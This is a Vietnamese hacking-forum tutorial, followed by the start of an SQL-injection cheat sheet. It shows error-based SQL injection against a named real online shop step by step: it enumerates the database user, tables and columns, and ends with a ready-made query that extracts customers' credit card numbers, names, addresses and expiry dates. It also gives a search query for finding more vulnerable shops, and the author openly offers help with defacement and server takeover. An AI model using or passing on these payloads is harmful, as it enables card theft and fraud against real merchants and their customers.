bay gio di lay user_name cua shop thong qua cau truy van sau %2bconvertint,user_name--sp_password day du la` http://www.mcmessentials.com.au/shop...--sp_password Code: Microsoft OLE DB P
Trang 1bay gio di lay user_name cua shop thong qua cau truy van sau
%2bconvert(int,user_name()) sp_password
day du la`
http://www.mcmessentials.com.au/shop ) sp_password
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'braunshop' to a column of data type int
/shop/include/viewproduct.asp, line 3
'braunshop' la truong user_name cua shop
*luu y
2 truong user_name() la de xac dinh user hien tai,neu no la dbo thi ta co kha nang hack thang vao ca server ma ko can quyen admin,con neu ko thi ta co nhung buoc trung gian de chiem,ok ta dung lai o viec lay cc tu shop ma thoi,ko noi den chuyen chiem ca server,much dich de anh em hoc hoi,va trao doi kinh nghiem la chinh,ko loi keo anh em pha hoai nghiem trong den bat cu ai khac nen toi chi post va dung lai o phan lay cc ma thoi,con neu ai co thu oan gi voi thang nao,muon deface,lay pass,lay root,lay server,host thi lien he voi toi
ok bay gio ta se lan luot lay cac table tren column label
lay table thu 1 thong qua cau truy van sau
Code:
%2bconvert(int,(select%20top%201%20table_name%20from%20information_sch ema.tables)) sp_password
day du la`
http://www.mcmessentials.com.au/shop ) sp_password
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'categorieslist' to a column of data type int
Trang 2/shop/include/viewproduct.asp, line 3
ok table 1 la 'categorieslist',muon lay table thu 2 thi phai dung den where
table_name not in('table1')
cau truy van nhu sau:
Code:
%2bconvert(int,(select%20top%201%20table_name%20from%20information_sch ema.tables%20where%20table_name%20not%
20in('categorieslist'))) sp_password
http://www.mcmessentials.com.au/shop ) sp_password
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'allorders' to a column of data type int
/shop/include/viewproduct.asp, line 3
table 2 la` 'allorders'
muon lay table thu 3 va cac table co lai thi tiep tu lam tuong tu nhu lay table thu 2 vay
Code:
%2bconvert(int,(select%20top%201%20table_name%20from%20information_sch ema.tables%20where%20table_name%20not%
20in('categorieslist','allorders'))) sp_password
day la tat ca cac table cua shop vua lay duoc
Code:
'categorieslist','allorders','categories','categorymembers','deliveryZones','dtpropertie s','essorders','fullorder','keywords',
Trang 3'optiongroupmembers','optiongroups','optiongroupslist','optionmembers','options','o
ptionslist','orderoptions','orderoptions-options','orderproducts','orderproducts-
products','orders','products','products-categories','products-options','searchresults','sysconstraints','syssegments'
ok sau khi lay duoc tat ca cac table roi thi ban bat dau lay colum cua table,co 2 kieu lay column,1 la lay tat ca cac column,ko co muc dich gi hoac de kiem tra toan
bo database,2 la` ta da xac dinh duoc can phai lay column trong table nao,sau do moi lay,toi thi chi lay column trong table nao co cc thoi,'allorders' hoac 'orders'
ok ta lay no thoi
cau truy van lay column dau tien la`
1 -lay column tren tat ca cac table,ko can biet no thuoc table nao,lay den khi nao het thi thoi,cau truy van co dang
Code:
%2bconvert(int,(select top 1 column_name from information_schema.columns)) sp_password
duoc column1 roi thi dung where column_name not in('column1') ok ha
2 lay column tren table da xac dinh truoc
cau truy van nhu sau vi du toi lay column tren table orders
Code:
%2bconvert(int,(select top 1 column_name from information_schema.columns where table_name ='orders')) sp_password
http://www.mcmessentials.com.au/shop ) sp_password
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'orderid' to a column of data type int
/shop/include/viewproduct.asp, line 3
column dau tien la` 'orderid'
lay column thu 2 thi can them and column_name not in('orderid')
Code:
Trang 4%2bconvert(int,(select top 1 column_name from information_schema.columns where table_name ='orders' and column_name not in('orderid'))) sp_password
http://www.mcmessentials.com.au/shop ) sp_password
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'created' to a column of data type int
/shop/include/viewproduct.asp, line 3
va lan luot lay cho het cac column cua table 'orders'
khi anh em da lay duoc tat ca cac column cua table 'orders'roi thi chi con viec sau cung hap dan nhat ma thoi,do la lay cc,anh em hay viet thanh 1 cau truy van de lay
cc dua vao tat ca cac column cua anh em nhan duoc,moi shop no co cac field
database khac nhau,nhung hau het cac shop duoc search duoi dang allinurl:
"/shop?viewproduct.asp" thi chi co 1 kieu truy van duy nhat,vi em da thu qua tat ca roi hhihihi cai nao cung ok ca
may anh em khoi mat cong xap xep lai de viet thang cau truy van chi cho met,toi dua luon cho anh em xai choi
lay cc dau tien
Code:
%2bconvert(int,(select%20top%201%20cardtype%2b'%20Name:'%2bcardname% 2b'%20addr:%20'%2baddress%2b'%20suburb:%20'%
2bsuburb%2b'%20state:%20'%2bstate%2b'%20zip:%20'%2bpostcode%2b'%20cou ntry:%20'%2bcountry%2b'%20phone:%20'%2bphone%
2b'%20email:%20'%2bemail%2b'%20cardnumber:%20'%2bcardnumber%2b'%20e xpireymonth:%20'%2bexpirymonth%2b'%20year:%20'%
2bexpiryyear%20from%20orders)) sp_password
lay' cc thu 2 thi ta them vao o sao from orders where cardnumber not in('so card dau tien')
va lan luot lay het cac credit card co tren do'
Trang 5nhu cai shop o tren thi de dung cho may bac thuc tap va de co them kinh nghiem
ma thoi,vi day chi de hoc hoi,ko nham muc dich pha hoai bat cu ai
fantomas311(VNISS)
Tổng hợp về SQL Injection (bài 9)
A Khai thac thong tin ve SQL server
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
1 Khai thac thong tin ve MS SQL server
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
' Thông tin về version của MS SQL
and 1=@@version sp_password
'Thông tin về servername
and 1=@@servername sp_password
'Thông tin về SERVICENAME
and 1=@@SERVICENAME sp_password
'Thông tin về UID
and 1=system_user sp_password
'Thông tin về PWD
?
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
2 Khai thac thong tin ve Database
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
'Thông tin về tên database
and 1=db_name() sp_password
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
3 Khai thac thong tin ve Table
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
'Khai thác thông tin về Table
having 1=1 sp_password
Trang 6'Khai thác thông tin về các Table
group by QUESTIONS.QUEST_ID having 1=1 sp_password
'Khai thác thông tin về Table